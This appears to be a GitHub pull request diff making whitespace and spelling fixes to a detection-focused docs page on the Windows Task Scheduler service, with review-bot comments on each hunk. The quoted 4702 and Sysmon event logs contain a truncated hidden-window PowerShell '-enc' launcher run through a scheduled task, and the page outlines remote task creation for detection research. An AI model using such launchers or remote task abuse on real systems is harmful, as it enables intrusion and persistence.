minor spelling and trailing space update #72

Open: wants to merge 1 commit into base: master
238 changes: 119 additions & 119 deletions docs/library/windows/task_scheduler_service.md
Expand Up @@ -27,16 +27,16 @@ Offset : 510656
ServiceName : Schedule
ServiceDisplayName : Task Scheduler
IsServiceRunning : True
Endpoints : {[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-4803de23b17986468a], [86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[ubpmtaskhostchannel],
Endpoints : {[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-4803de23b17986468a], [86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[ubpmtaskhostchannel],
[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-83a142d94b8e74a91a]}
EndpointCount : 3
Client : False
Client : False
```

### RPC Clients
* taskcomp.dll
* taskschd.dll
* wmicmiplugin.dll
* wmicmiplugin.dll

### RPC Methods

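Review bot: the Endpoints, Client and wmicmiplugin.dll lines appear here as removed/added pairs that are visually identical, so this hunk is trailing-whitespace cleanup inside a fenced output block and changes no content. That is harmless, but because GitHub's rendered diff hides trailing spaces, it would help to say so in the PR description and point reviewers at the "Hide whitespace changes" view (`?w=1`) or `git diff --ignore-space-at-eol`, which should show this hunk as empty.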
Expand Down Expand Up @@ -65,8 +65,8 @@ ComplexTypes : {Struct_0, Struct_1, Struct_2}
FilePath : C:\Windows\System32\taskcomp.dll
Name : taskcomp.dll
Offset : 322256
ServiceName :
ServiceDisplayName :
ServiceName :
ServiceDisplayName :
IsServiceRunning : False
Endpoints : {[1ff70682-0a51-30e8-076d-740be8cee98b, 1.0] ncalrpc:[LRPC-b858137bbb082a0e8d]}
EndpointCount : 1
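Review bot: the `ServiceName :` and `ServiceDisplayName :` lines are empty-valued fields from captured console output, so the trailing spaces removed here were part of the pasted output rather than an authoring error; stripping them is fine. To keep this from recurring in other captured-output blocks, consider adding `trim_trailing_whitespace = true` for `*.md` in an `.editorconfig`, after checking that no prose line in these docs relies on two trailing spaces for a Markdown hard line break.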
Expand Down Expand Up @@ -104,7 +104,7 @@ Client : False

## Interact with Task Scheduler Remotely

### Powershell - Schedule.Service COM Object
### Powershell - Schedule.Service COM Object
```Powershell
# connect to Task Scheduler:
$service = New-Object -ComObject Schedule.Service
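Review bot: since this PR is a spelling pass, the heading `### Powershell - Schedule.Service COM Object` should also be corrected to the product's casing, `PowerShell`, and the fence tag on the following line is better as lowercase `powershell`, which is the identifier syntax highlighters match on; the hunk as written only strips the trailing space from the heading.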
Expand Down Expand Up @@ -145,43 +145,43 @@ $NewTask.stop(0)
* EventID 4702 (Target): A Scheduled Task Was updated

```xml
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4702</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:12:22.000309100Z" />
<EventRecordID>2292968</EventRecordID>
<Correlation ActivityID="{262c1204-cb81-0000-0dbf-29867cced601}" />
<Execution ProcessID="740" ThreadID="1560" />
<Channel>Security</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3786818125-2382361537-3207726629-1104</Data>
<Data Name="SubjectUserName">pgustavo</Data>
<Data Name="SubjectDomainName">THESHIRE</Data>
<Data Name="SubjectLogonId">0x9ac216f</Data>
<Data Name="TaskName">\Ward0g</Data>
<Data Name="TaskContentNew"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2020-12-16T08:09:21.4521839</Date> <Author>THESHIRE\sbeavers</Author> <Description>Que pasa</Description> <URI>\Ward0g</URI> </RegistrationInfo> <Triggers> <RegistrationTrigger> <Enabled>true</Enabled> </RegistrationTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>S-1-5-21-3786818125-2382361537-3207726629-1106</UserId> <LogonType>InteractiveToken</LogonType> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>powershell</Command> <Arguments>-noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBwAt.....</Data>
<Data Name="ClientProcessStartKey">0</Data>
<Data Name="ClientProcessId">0</Data>
<Data Name="ParentProcessId">0</Data>
<Data Name="RpcCallClientLocality">0</Data>
<Data Name="FQDN">WORKSTATION6.theshire.local</Data>
</EventData>
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4702</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:12:22.000309100Z" />
<EventRecordID>2292968</EventRecordID>
<Correlation ActivityID="{262c1204-cb81-0000-0dbf-29867cced601}" />
<Execution ProcessID="740" ThreadID="1560" />
<Channel>Security</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3786818125-2382361537-3207726629-1104</Data>
<Data Name="SubjectUserName">pgustavo</Data>
<Data Name="SubjectDomainName">THESHIRE</Data>
<Data Name="SubjectLogonId">0x9ac216f</Data>
<Data Name="TaskName">\Ward0g</Data>
<Data Name="TaskContentNew"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2020-12-16T08:09:21.4521839</Date> <Author>THESHIRE\sbeavers</Author> <Description>Que pasa</Description> <URI>\Ward0g</URI> </RegistrationInfo> <Triggers> <RegistrationTrigger> <Enabled>true</Enabled> </RegistrationTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>S-1-5-21-3786818125-2382361537-3207726629-1106</UserId> <LogonType>InteractiveToken</LogonType> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>powershell</Command> <Arguments>-noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBwAt.....</Data>
<Data Name="ClientProcessStartKey">0</Data>
<Data Name="ClientProcessId">0</Data>
<Data Name="ParentProcessId">0</Data>
<Data Name="RpcCallClientLocality">0</Data>
<Data Name="FQDN">WORKSTATION6.theshire.local</Data>
</EventData>
</Event>
```

* EventID 4688 (Target): A New Process Has been created

### Microsoft-Windows-TaskScheduler/Operational Logs
* EventID 140: Task Rergistration Updated
* EventID 140: Task Registration Updated
* EventID 100: Task Started
* EventID 201: Action Completed
* EventID 201: Task Completed
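Review bot: the `Rergistration` to `Registration` fix on the EventID 140 line is a straightforward typo correction, but the last pair changes `* EventID 201: Action Completed` to `* EventID 201: Task Completed`, which alters meaning rather than spelling and is outside the "minor spelling and trailing space" scope of the PR; please confirm it against the Task Scheduler operational log's own event names before merging, since Task Scheduler uses separate event IDs for action completion and task completion, and if the intent was to document task completion the event ID should change with the wording. The 4702 XML block otherwise differs only by indentation.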
Expand All @@ -193,94 +193,94 @@ $NewTask.stop(0)
* EventID 1: ProcessCreate (When Task is stopped)

```xml
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:23:48.196270400Z" />
<EventRecordID>9090341</EventRecordID>
<Correlation />
<Execution ProcessID="3256" ThreadID="4036" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2020-12-16 17:23:48.185</Data>
<Data Name="ProcessGuid">{649442b8-42a4-5fda-af62-000000000600}</Data>
<Data Name="ProcessId">2836</Data>
<Data Name="Image">C:\Windows\System32\taskhostw.exe</Data>
<Data Name="FileVersion">10.0.18362.1237 (WinBuild.160101.0800)</Data>
<Data Name="Description">Host Process for Windows Tasks</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">taskhostw.exe</Data>
<Data Name="CommandLine">taskhostw.exe C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJAA4...</Data>
<Data Name="CurrentDirectory">C:\windows\system32\</Data>
<Data Name="User">THESHIRE\sbeavers</Data>
<Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
<Data Name="LogonId">0xe016c3</Data>
<Data Name="TerminalSessionId">2</Data>
<Data Name="IntegrityLevel">Medium</Data>
<Data Name="Hashes">SHA1=6630F5E1A1ACC1C8E95A7958542DD87D0735D99B,MD5=52071D9553A92A12F22DDDF6DB6F9643,SHA256=ABCA3394728697205DEAD7C9B7B9076CDD28BEE84E7A3C84514478BC033E531A,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083</Data>
<Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
<Data Name="ParentProcessId">2220</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
<Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:23:48.196270400Z" />
<EventRecordID>9090341</EventRecordID>
<Correlation />
<Execution ProcessID="3256" ThreadID="4036" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2020-12-16 17:23:48.185</Data>
<Data Name="ProcessGuid">{649442b8-42a4-5fda-af62-000000000600}</Data>
<Data Name="ProcessId">2836</Data>
<Data Name="Image">C:\Windows\System32\taskhostw.exe</Data>
<Data Name="FileVersion">10.0.18362.1237 (WinBuild.160101.0800)</Data>
<Data Name="Description">Host Process for Windows Tasks</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">taskhostw.exe</Data>
<Data Name="CommandLine">taskhostw.exe C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJAA4...</Data>
<Data Name="CurrentDirectory">C:\windows\system32\</Data>
<Data Name="User">THESHIRE\sbeavers</Data>
<Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
<Data Name="LogonId">0xe016c3</Data>
<Data Name="TerminalSessionId">2</Data>
<Data Name="IntegrityLevel">Medium</Data>
<Data Name="Hashes">SHA1=6630F5E1A1ACC1C8E95A7958542DD87D0735D99B,MD5=52071D9553A92A12F22DDDF6DB6F9643,SHA256=ABCA3394728697205DEAD7C9B7B9076CDD28BEE84E7A3C84514478BC033E531A,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083</Data>
<Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
<Data Name="ParentProcessId">2220</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
<Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
</Event>
```

* EventID 1: ProcessCreate (Execution when task is forced to execute or task is updated)

```xml
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:40:06.014964400Z" />
<EventRecordID>9103725</EventRecordID>
<Correlation />
<Execution ProcessID="3256" ThreadID="4036" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2020-12-16 17:40:05.997</Data>
<Data Name="ProcessGuid">{649442b8-4675-5fda-d962-000000000600}</Data>
<Data Name="ProcessId">6840</Data>
<Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="FileVersion">10.0.18362.1 (WinBuild.160101.0800)</Data>
<Data Name="Description">Windows PowerShell</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">PowerShell.EXE</Data>
<Data Name="CommandLine">C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwAp...</Data>
<Data Name="CurrentDirectory">C:\windows\system32\</Data>
<Data Name="User">THESHIRE\sbeavers</Data>
<Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
<Data Name="LogonId">0xe016c3</Data>
<Data Name="TerminalSessionId">2</Data>
<Data Name="IntegrityLevel">Medium</Data>
<Data Name="Hashes">SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481</Data>
<Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
<Data Name="ParentProcessId">2220</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
<Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:40:06.014964400Z" />
<EventRecordID>9103725</EventRecordID>
<Correlation />
<Execution ProcessID="3256" ThreadID="4036" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2020-12-16 17:40:05.997</Data>
<Data Name="ProcessGuid">{649442b8-4675-5fda-d962-000000000600}</Data>
<Data Name="ProcessId">6840</Data>
<Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="FileVersion">10.0.18362.1 (WinBuild.160101.0800)</Data>
<Data Name="Description">Windows PowerShell</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">PowerShell.EXE</Data>
<Data Name="CommandLine">C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwAp...</Data>
<Data Name="CurrentDirectory">C:\windows\system32\</Data>
<Data Name="User">THESHIRE\sbeavers</Data>
<Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
<Data Name="LogonId">0xe016c3</Data>
<Data Name="TerminalSessionId">2</Data>
<Data Name="IntegrityLevel">Medium</Data>
<Data Name="Hashes">SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481</Data>
<Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
<Data Name="ParentProcessId">2220</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
<Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
</Event>
```

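Review bot: both Sysmon EventID 1 blocks in this hunk are re-indented copies of the same events with no textual change, so this is whitespace-only as well. While re-indenting these `xml` fences, the `- ` prefixes on the `<Event>`, `<System>` and `<EventData>` lines could be dropped: they are Event Viewer's collapse markers carried over from copy-paste, not XML, and removing them leaves each block as well-formed XML that a reader can paste into a parser or a Sysmon/EDR test harness. The `ParentCommandLine` of `svchost.exe -k netsvcs -p -s Schedule` with `taskhostw.exe` / `powershell.EXE` children is the detection-relevant pair in both events, so keep those lines intact when cleaning up.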